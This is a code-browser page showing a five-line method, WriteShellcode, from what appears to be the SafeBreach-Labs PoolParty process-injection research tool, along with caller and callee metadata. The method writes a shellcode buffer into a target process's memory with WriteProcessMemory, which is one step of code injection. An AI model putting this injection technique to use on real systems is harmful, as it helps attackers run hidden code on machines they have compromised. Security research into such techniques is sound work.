MCPcopy Create free account
hub / github.com/SafeBreach-Labs/PoolParty / WriteShellcode

Method WriteShellcode

PoolParty/PoolParty.cpp:57–61  ·  view source on GitHub ↗

Source from the content-addressed store, hash-verified

55}
56
57void PoolParty::WriteShellcode() const
58{
59 w_WriteProcessMemory(*m_p_hTargetPid, m_ShellcodeAddress, m_cShellcode, m_szShellcodeSize);
60 BOOST_LOG_TRIVIAL(info) << "Written shellcode to the target process";
61}
62
63void PoolParty::Inject()
64{

Callers 1

InjectMethod · 0.95

Calls 1

w_WriteProcessMemoryFunction · 0.85

Tested by

no test coverage detected